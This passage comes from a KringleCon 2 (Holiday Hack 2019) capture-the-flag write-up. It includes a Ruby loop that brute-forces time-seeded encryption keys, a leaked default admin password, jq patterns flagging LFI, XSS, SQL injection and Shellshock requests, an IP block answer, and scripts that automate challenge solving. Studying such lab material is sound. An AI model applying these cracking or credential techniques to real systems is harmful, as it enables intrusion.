#Read in the bytes from our encrypted file
data = File.open("ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf.enc").read
#Take the key from stdin
seed = ARGV[0].to_i
#Generate the encryption key using the Linear Congruential Algorithm and Seed
key = generate_key(seed)
begin
puts("Generated key: #{key.unpack('H*')}")
out = decrypt(data, key)
#If we were able to decrypt something
if out.length > 0
#Create a file named the epoch time of the seed
File.open(seed.to_s, 'wb').write(out)
end
rescue Exception
end
To run our decryption script with the correct seed:
date +%s -d"12/6/2019 1900 UTC"
1575658800
date +%s -d"12/6/2019 2100 UTC"
1575669600
for i in `seq 1575658800 1575669600`; do ruby crypto_solution.rb $i; done
...
Generated key: ["a8dc2606e1cebc3d"]
Generated key: ["abd9ee052b25e4ce"]
Generated key: ["aed5b605767c0d5f"]
Generated key: ["b2d27e04c0d335ef"]
Generated key: ["b5ce46030b295e80"]
Generated key: ["b8ca0f0355808611"]
Generated key: ["bcc7d702a0d7afa2"]
Generated key: ["bfc39f01eb2ed732"]
...
This will leave us with sever files named 1575…. so to find the pdf, we can run find.
file 15*
1575658882: data
1575658972: data
1575659018: data
1575659060: data
1575663650: PDF document, version 1.3
...
And we have the decrypted file!
Misc¶
11) Open the Sleigh Shop Door¶
Goal¶
Visit Shinny Upatree in the Student Union and help solve their problem. What is written on the paper you retrieve for Shinny?
For hints on achieving this objective, please visit the Student Union and talk with Kent Tinseltooth.
Dialog¶
Shinny Upatree¶
- Before Solving
In fact, I know WHO is causing all the trouble.
Cindy? Oh no no, not that who. And stop guessing - you'll never figure it out.
The only way you could would be if you could break into my crate, here.
You see, I've written the villain's name down on a piece of paper and hidden it away securely!
...
Psst - hey!
I'm Shinny Upatree, and I know what's going on!
Yeah, that's right - guarding the sleigh shop has made me privvy to some serious, high-level intel.
In fact, I know WHO is causing all the trouble.
Cindy? Oh no no, not that who. And stop guessing - you'll never figure it out.
- After Solving
Wha - what?? You got into my crate?!
Well that's embarrassing...
But you know what? Hmm... If you're good enough to crack MY security...
Do you think you could bring this all to a grand conclusion?
Please go into the sleigh shop and see if you can finish this off!
Stop the Tooth Fairy from ruining Santa's sleigh route!
Solution¶
Hint
Explanation¶
12) Filter Out Poisoned Sources of Weather Data¶
Goal¶
Use the data supplied in the Zeek JSON logs to identify the IP addresses of attackers poisoning Santa’s flight mapping software. Block the 100 offending sources of information to guide Santa’s sleigh through the attack. Submit the Route ID (“RID”) success value that you’re given. For hints on achieving this objective, please visit the Sleigh Shop and talk with Wunorse Openslae.
Location¶
Sleigh Shop
Dialog¶
Krampus¶
But there’s still time! Solve the final challenge in your badge by blocking the bad IPs at srf.elfu.org and save the holiday season!
Solution¶
Answer
Below
0.216.249.31,10.122.158.57,10.155.246.29,102.143.16.184,103.235.93.133,104.179.109.113,106.132.195.153,106.93.213.219,111.81.145.191,116.116.98.205,118.196.230.170,118.26.57.38,121.7.186.163,123.127.233.97,126.102.12.53,129.121.121.48,131.186.145.73,132.45.187.177,13.39.153.254,135.203.243.43,135.32.99.116,140.60.154.239,142.128.135.10,148.146.134.52,150.45.133.97,150.50.77.238,158.171.84.209,168.66.108.62,169.242.54.5,173.37.160.150,185.19.7.133,186.28.46.179,187.152.203.243,187.178.169.123,190.245.228.38,19.235.69.221,193.228.194.36,200.75.228.240,203.68.29.5,217.132.156.225,220.132.33.81,2.230.60.70,223.149.180.133,22.34.153.164,2.240.116.254,225.191.220.138,226.102.56.13,226.240.188.154,227.110.45.126,229.133.163.235,229.229.189.246,230.246.50.221,231.179.108.238,23.49.177.78,238.143.78.114,249.237.77.152,249.34.9.16,249.90.116.138,250.22.86.40,252.122.243.212,253.182.102.55,253.65.40.39,254.140.181.172,25.80.197.172,27.88.56.114,28.169.41.122,29.0.183.220,31.116.232.143,31.254.228.4,33.132.98.193,34.129.179.28,34.155.174.167,37.216.249.50,42.103.246.130,42.103.246.250,42.127.244.30,42.16.149.112,42.191.112.181,44.164.136.41,44.74.106.131,45.239.232.245,48.66.193.176,49.161.8.58,50.154.111.0,53.160.218.44,56.5.47.137,61.110.82.125,65.153.114.120,66.116.147.181,68.115.251.76,69.221.145.150,75.73.228.192,79.198.89.109,80.244.147.207,81.14.204.154,83.0.8.119,84.147.231.129,84.185.44.166,87.195.80.126,9.206.212.33,92.213.148.0,95.166.116.45,97.220.93.190
Explanation¶
The document from 10) Recover Cleartext Document says that the password is stored on the elfu research lab’s git server. We can also find a web request to “/README.md” in the zeek logs. https://srf.elfu.org/README.md
# Sled-O-Matic - Sleigh Route Finder Web API
### Installation
```
sudo apt install python3-pip
sudo python3 -m pip install -r requirements.txt
```
#### Running:
`python3 ./srfweb.py`
#### Logging in:
You can login using the default admin pass:
`admin 924158F9522B3744F5FCD4D10FAC4356`
However, it's recommended to change this in the sqlite db to something custom.
With that, we are able to log in and start looking at the api documentation.
#!/bin/bash
#LFI
jq '.[] | select(.uri | contains("passwd"))."id.orig_h"' http.log
#XSS
jq '.[] | select(.uri | contains("<script>"))."id.orig_h"' http.log
jq '.[] | select(.host | contains("<script>"))."id.orig_h"' http.log
#SQLI
jq '.[] | select(.uri | contains("SELECT"))."id.orig_h"' http.log
jq '.[] | select(.user_agent | contains("SELECT"))."id.orig_h"' http.log
jq '.[] | select(.username | contains("1=1"))."id.orig_h"' http.log
#SHELL
jq '.[] | select(.user_agent | contains("() {"))."id.orig_h"' http.log
./find-evil.sh >> malicious_ips
Then we can comment out the searches that use “user_agent” and run again so we can just get the ips we want to pivot on:
./find-evil.sh >> ua_search
Hint
export IFS=$'\n'Then we can take that list of IPs and get all of the associated user-agents.
for i in `cat ua_search`; do jq ".[] | select(."id.orig_h" == $i).user_agent" http.log; done > malicious_ua
for i in `cat malicious_ua`; do jq ".[] | select(.user_agent == $i).user_agent" http.log; done | sort | uniq -c | sort -n > malicious_ua_count
Remove any user agents that have more than 5 matches and then remove the first column. In vim, you can do %s/^.\{-}"/"/g.
Then we can search for those malicious user agents and get all ips associated.
for i in `cat malicious_ua_count`; do jq ".[] | select(.user_agent == $i).\"id.orig_h\"" http.log; done | sort | uniq -c > ua_pivot
Then finally, to dedup and format:
cat malicious_ips ua_pivot | sort | uniq | sed 's/"//g' | tr '\n' ','
0.216.249.31,10.122.158.57,10.155.246.29,102.143.16.184,103.235.93.133,104.179.109.113,106.132.195.153,106.93.213.219,111.81.145.191,116.116.98.205,118.196.230.170,118.26.57.38,121.7.186.163,123.127.233.97,126.102.12.53,129.121.121.48,131.186.145.73,132.45.187.177,13.39.153.254,135.203.243.43,135.32.99.116,140.60.154.239,142.128.135.10,148.146.134.52,150.45.133.97,150.50.77.238,158.171.84.209,168.66.108.62,169.242.54.5,173.37.160.150,185.19.7.133,186.28.46.179,187.152.203.243,187.178.169.123,190.245.228.38,19.235.69.221,193.228.194.36,200.75.228.240,203.68.29.5,217.132.156.225,220.132.33.81,2.230.60.70,223.149.180.133,22.34.153.164,2.240.116.254,225.191.220.138,226.102.56.13,226.240.188.154,227.110.45.126,229.133.163.235,229.229.189.246,230.246.50.221,231.179.108.238,23.49.177.78,238.143.78.114,249.237.77.152,249.34.9.16,249.90.116.138,250.22.86.40,252.122.243.212,253.182.102.55,253.65.40.39,254.140.181.172,25.80.197.172,27.88.56.114,28.169.41.122,29.0.183.220,31.116.232.143,31.254.228.4,33.132.98.193,34.129.179.28,34.155.174.167,37.216.249.50,42.103.246.130,42.103.246.250,42.127.244.30,42.16.149.112,42.191.112.181,44.164.136.41,44.74.106.131,45.239.232.245,48.66.193.176,49.161.8.58,50.154.111.0,53.160.218.44,56.5.47.137,61.110.82.125,65.153.114.120,66.116.147.181,68.115.251.76,69.221.145.150,75.73.228.192,79.198.89.109,80.244.147.207,81.14.204.154,83.0.8.119,84.147.231.129,84.185.44.166,87.195.80.126,9.206.212.33,92.213.148.0,95.166.116.45,97.220.93.190
The Story¶
Tooth Fairy¶
Date: February 28, 2019
To the Administration, Faculty, and Staff of Elf University
17 Christmas Tree Lane
North Pole
From: A Concerned and Aggrieved Character
Subject: DEMAND: Spread Holiday Cheer to Other Holidays and Mythical Characters… OR
ELSE!
Attention All Elf University Personnel,
It remains a constant source of frustration that Elf University and the entire operation at the
North Pole focuses exclusively on Mr. S. Claus and his year-end holiday spree. We URGE
you to consider lending your considerable resources and expertise in providing merriment,
cheer, toys, candy, and much more to other holidays year-round, as well as to other mythical
characters.
For centuries, we have expressed our frustration at your lack of willingness to spread your
cheer beyond the inaptly-called “Holiday Season.” There are many other perfectly fine
holidays and mythical characters that need your direct support year-round.
If you do not accede to our demands, we will be forced to take matters into our own hands.
We do not make this threat lightly. You have less than six months to act demonstrably.
Sincerely,
--A Concerned and Aggrieved Character
I hate how Santa is so beloved, but only works one day per year!
He has all of the resources of the North Pole and the elves to help him too.
I run a solo operation, toiling year-round collecting deciduous bicuspids and more from children.
But I get nowhere near the gratitude that Santa gets. He needs to share his holiday resources with the rest of us!
But, although you found me, you haven’t foiled my plot!
Santa’s sleigh will NOT be able to find its way.
I will get my revenge and respect!
I want my own holiday, National Tooth Fairy Day, to be the most popular holiday on the calendar!!!
Santa¶
You did it! Thank you! You uncovered the sinister plot to destroy the holiday season!
Through your diligent efforts, we’ve brought the Tooth Fairy to justice and saved the holidays!
Ho Ho Ho!
The more I laugh, the more I fill with glee.
And the more the glee,
The more I'm a merrier me!
Merry Christmas and Happy Holidays.
Krampus¶
Congratulations on a job well done!
Oh, by the way, I won the Frido Sleigh contest.
I got 31.8% of the prizes, though I'll have to figure that out.
Tooth Fairy¶
You foiled my dastardly plan! I’m ruined!
And I would have gotten away with it too, if it weren't for you meddling kids!
Whose grounds these are, I think I know
His home is in the North Pole though
He will not mind me traipsing here
To watch his students learn and grow
Some other folk might stop and sneer
"Two turtle doves, this man did rear?"
I'll find the birds, come push or shove
Objectives given: I'll soon clear
Upon discov'ring each white dove,
The subject of much campus love,
I find the challenges are more
Than one can count on woolen glove.
Ho ho, what's this? What strange boudoir!
Things here cannot be what they seem
That portal's more than clothing store.
Who enters contests by the ream
And lives in tunnels meant for steam?
This Krampus bloke seems rather strange
And yet I must now join his team...
Despite this fellow's funk and mange
My fate, I think, he's bound to change.
What is this contest all about?
His victory I shall arrange!
To arms, my friends! Do scream and shout!
Some villain targets Santa's route!
What scum - what filth would seek to end
Kris Kringle's journey while he's out?
Surprised, I am, but "shock" may tend
To overstate and condescend.
'Tis little more than plot reveal
That fairies often do extend
And yet, despite her jealous zeal,
My skills did win, my hacking heal!
No dental dealer can so keep
Our red-clad hero in ordeal!
This Christmas must now fall asleep,
But next year comes, and troubles creep.
And Jack Frost hasn't made a peep,
And Jack Frost hasn't made a peep...
Thankfully, I didn’t have to
implement my plan by myself!
Jack Frost promised to use his
wintry magic to help me subvert
Santa’s horrible reign of holiday
merriment NOW and FOREVER!
Misc¶
If you attempt to connect to an invalid challenge url, you see this ascii art:
https://docker2019.kringlecon.com/
Which looks like it was sourced from here: https://ascii.co.uk/art/santa
_______________________________________
< Ho Ho Ho, Invalid Challenge Selection >
---------------------------------------
\ ______________
\ / \ \
\ / \ \
/ _________ \ |
\/ _ \ / |
\ / \ \/_ |
| O_O_/ || \_ \
/ __(_ __ || \ /
/\/___\___\_/ \ /_\
/ __ \/ \
| |\___/
______|________ | \
/ /\ / \
| | \ / \
\______________\ |___/ \
_|___ |_____\ \
/| __| |_|| o \ \
| | \ |_||____\_____/\
\_|____/ / | \_____/____
| // | / \ \
| // |_________\_/\ \ \__ ______
| / | /_ |_/_/ \/_//__/|
| |________// \| \ //_//__/||\_
| | \__// | / | ||__|/_ \
| | | | \_|_/ \
| ___________ | | | / |
\ \|______| / _____ |
\ \ | | \\ _/ / |
\ \_____|______\___ \ -/___/ |
\ ______\_____ /
\ / \ \ /
\__________________ \ | |______/ Tiziana
\ / /
\__/____________/
Elves¶
There are more elves than are actually used in the game. Since they’re numbered, we can enumerate them and find there are 22.
Dual Core - Tis Not The Season¶
Appendix¶
Scripts¶
Automatic Recordings¶
We scripted the recording of a lot of the asiinema videos, adapting an existing script from: https://arthepsy.eu/ctf/kringlecon2018/cranpi.hacks.html
Andris did most of the hard work already, we just added the logic to start the asiinema recorder. This file will take a json file of challenges/answers and record a separate video for each.
Usage: solve.py <solution.json>
[
{
"name": "linux_path",
"url": "https://docker2019.kringlecon.com/?challenge=path&id=01d90e63-7466-4980-be49-f36e9ab4fdb7&username=csnTravis",
"answers": [
"ls",
"which ls",
"which -a ls",
"find / -name \"ls\" 2>/dev/null",
"locate */ls 2>/dev/null",
"/bin/ls",
"cat rej\u0009",
"sleep 2",
"/bin/ls -latr",
"cat .elf\u0009"
]
}
]
#!/usr/bin/python3
from __future__ import print_function, unicode_literals
import fcntl, shutil, select, sys, os, re, socketio, termios, time, tty, urllib3, json
import asciinema, random
urllib3.disable_warnings()
sio = socketio.Client()
@sio.on('connect')
def on_connect():
ts = shutil.get_terminal_size((80, 24))
sio.emit('resize', {"col":ts.columns, "row":ts.lines})
@sio.on('output', namespace='/')
def on_output(data):
sys.stdout.write(data)
sys.stdout.flush()
def console(answers):
fd = sys.stdin.fileno()
fdtc = termios.tcgetattr(fd)
fdfl = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, fdfl & ~os.O_NONBLOCK)
tty.setraw(sys.stdin)
pc = None
time.sleep(2)
answers.append('sleep 3')
answers.append(u'\u0004')
answers.append(chr(27))
for i in answers:
i += "\n"
if re.match('sleep', i):
time.sleep(int(re.search('\d+', i).group(0)))
else:
for j in i:
c = ord(j)
pc = None
if c == 27:
sio.disconnect()
break
sio.emit('input', chr(c))
#time.sleep(random.randint(10,30) * .01)
time.sleep(.05)
time.sleep(1)
fcntl.fcntl(fd, fcntl.F_SETFL, fdfl)
termios.tcsetattr(fd, termios.TCSADRAIN, fdtc)
if __name__ == '__main__':
if len(sys.argv) == 2:
with open(sys.argv[1]) as solutions:
chals = json.loads(solutions.read())
for i in chals:
asciinema.record_asciicast(path=i['name'] + ".cast", title=i['name'],
command="./" + sys.argv[0] + " "
+ sys.argv[1] + " " + i['name'])
out = []
with open(i['name'] + ".cast") as cast:
for l in cast:
if re.search("#####hhc:", l) == None:
out.append(l)
out = out[:-1]
with open(i['name'] + ".cast", 'w') as cast:
cast.writelines(out)
else:
with open(sys.argv[1]) as solutions:
chals = json.loads(solutions.read())
for i in chals:
if i['name'] == sys.argv[2]:
sio.connect(i['url'], socketio_path='wetty/socket.io', transports='websocket')
sio.start_background_task(console(i['answers']))
sio.wait()
exit()
Crate Cracker 9000¶
This was able to solve 11) Open the Sleigh Shop Door in under two seconds!
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import json
import re
import pytesseract
import time
from PIL import Image
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
sslchk = False
# enable browser logging and grab webpage
d = DesiredCapabilities.CHROME
d['goog:loggingPrefs'] = { 'browser':'ALL' }
options = webdriver.ChromeOptions()
prefs = {"profile.managed_default_content_settings.images": 2}
options.add_experimental_option("prefs", prefs)
options.add_argument("--headless")
options.add_argument("--window-size=1920x1080")
driver = webdriver.Chrome(desired_capabilities=d, options=options)
driver.get('http://sleighworkshopdoor.elfu.org')
# grab the key from console
console_entry = driver.get_log('browser')[1]['message'].split("%c")
key0 = console_entry[2].strip()
# I want all the sauce to parse
sauce = driver.page_source
# need to grab the seed
retmp = re.search('/title><link rel="stylesheet" href="css/styles.css/(.{36})"><link', sauce, re.IGNORECASE)
seed = retmp.group(1)
css_url = 'https://sleighworkshopdoor.elfu.org/css/styles.css/' + seed
cr = requests.get(css_url, verify=sslchk)
retmp = re.search('<div class="libra"><strong>(.*)</strong>', sauce, re.IGNORECASE)
key1 = retmp.group(1)
png_url = 'https://sleighworkshopdoor.elfu.org/images/' + seed + '.png'
save_path = 'seed_img.png'
r = requests.get(png_url, verify=sslchk, stream=True)
with open(save_path, 'wb') as image:
for chunk in r:
image.write(chunk)
key2 = pytesseract.image_to_string(Image.open(save_path))
if '/' in key2:
key2 = key2.replace('/', '7')
print('Replaced "/" with "7" because OCR sucks sometimes')
print('Fixed key: ' + key2)
key3 = driver.execute_script("return localStorage.getItem('🛢️🛢️🛢️');");
retmp = re.search('<title>Crack the Crate(.*)</title>', sauce, re.IGNORECASE)
key4 = retmp.group(1).strip()
retmp = re.search('<div class="hologram"><div class="items"><div class=".{8}">(.)</div><div class=".{8}">(.)</div><div class=".{8}">(.)</div><div class=".{8}">(.)</div><div class=".{8}">(.)</div><div class=".{8}">(.)</div><div class=".{8}">(.)</div><div class=".{8}">(.)</div>', sauce, re.IGNORECASE)
key5 = retmp.group(4) + retmp.group(1) + retmp.group(5) + retmp.group(7) + retmp.group(6) + retmp.group(3) + retmp.group(8) + retmp.group(2)
retmp = re.search("<style>.instructions { font-family: '(.{8})'", sauce, re.IGNORECASE)
key6 = retmp.group(1)
key7 = 'VERONICA'
#css_url = 'https://sleighworkshopdoor.elfu.org/css/styles.css/' + seed
#cr = requests.get(css_url, verify=sslchk)
retmp = re.search("span\.chakra:nth-child\(1\):active:after \{\n^ content: \'(.{1,2})\';", cr.text, re.MULTILINE)
str0 = retmp.group(1)
retmp = re.search("span\.chakra:nth-child\(2\):active:after \{\n^ content: \'(.{1,2})\';", cr.text, re.MULTILINE)
str1 = retmp.group(1)
retmp = re.search("span\.chakra:nth-child\(3\):active:after \{\n^ content: \'(.{1,2})\';", cr.text, re.MULTILINE)
str2 = retmp.group(1)
retmp = re.search("span\.chakra:nth-child\(4\):active:after \{\n^ content: \'(.{1,2})\';", cr.text, re.MULTILINE)
str3 = retmp.group(1)
retmp = re.search("span\.chakra:nth-child\(5\):active:after \{\n^ content: \'(.{1,2})\';", cr.text, re.MULTILINE)
str4 = retmp.group(1)
key8 = str0 + str1 + str2 + str3 + str4
key9 = 'KD29XJ37'
keys = [key0, key1, key2, key3, key4, key5, key6, key7, key8, key9]
sess = requests.Session()
sess.headers['Content-Type'] = 'application/json'
sess.headers['User-Agent'] = 'Elfzilla/5.0 (X11; SantaHat; Linux x86_64; rv:70.0) Gecko/20100101 Snowman/1337'
sess.headers['Referer'] = 'https://sleighworkshopdoor.elfu.org'
sess.headers['Origin'] = 'https://sleighworkshopdoor.elfu.org'
sess.headers['Accept'] = 'application/json'
j0 = '{"seed":"' + seed + '","codes":{"1":"' + key0 + '","2":"' + key1 + '","3":"' + key2 + '","4":"' + key3 + '","5":"' + key4 + '","6":"' + key5 + '","7":"' + key6 + '","8":"VERONICA","9":"' + key8 + '","10":"KD29XJ37"}}'
j00 = json.loads(j0)
openr = sess.post('https://sleighworkshopdoor.elfu.org/open', verify=sslchk, json=j00)
print(openr.text)
Thanosify¶
All credit to: @ArdilloSec
https://gist.github.com/Ardillo/9eff43733c7ad90892171fbaf388c0c6
The only change from the original was to stop logging to the console.
window.setInterval(thanosify, 2000);
function thanosify(){
[].forEach.call(document.querySelectorAll('.player'), function (el) {
if (!el.className.includes("me")) {
el.style.visibility = 'hidden'
}
});}
Credits¶
Writeup¶
KringleCon 2: Turtle Doves¶
About CyberSN¶
CyberSN, founded in 2014, specializes in permanent and contract staffing for cybersecurity, information security and security sales professionals. With a national and international reach; CyberSN dramatically decreases the frustration, time and cost associated with job searching and hiring for cybersecurity professionals. Our proprietary cybersecurity common language technology platform utilized by our cyber staffing directors and our cyber staffing partners, ensures CyberSN is able to rapidly connect qualified cybersecurity professional and employers. This proprietary technology platform uses cybersecurity common language to create job descriptions and understands the job seeker’s actual experience. In short, CyberSN makes job searching and hiring simpler while creating higher retention rates. We offer engaged, contingency and retained placement services.
For more information, visit https://www.CyberSN.com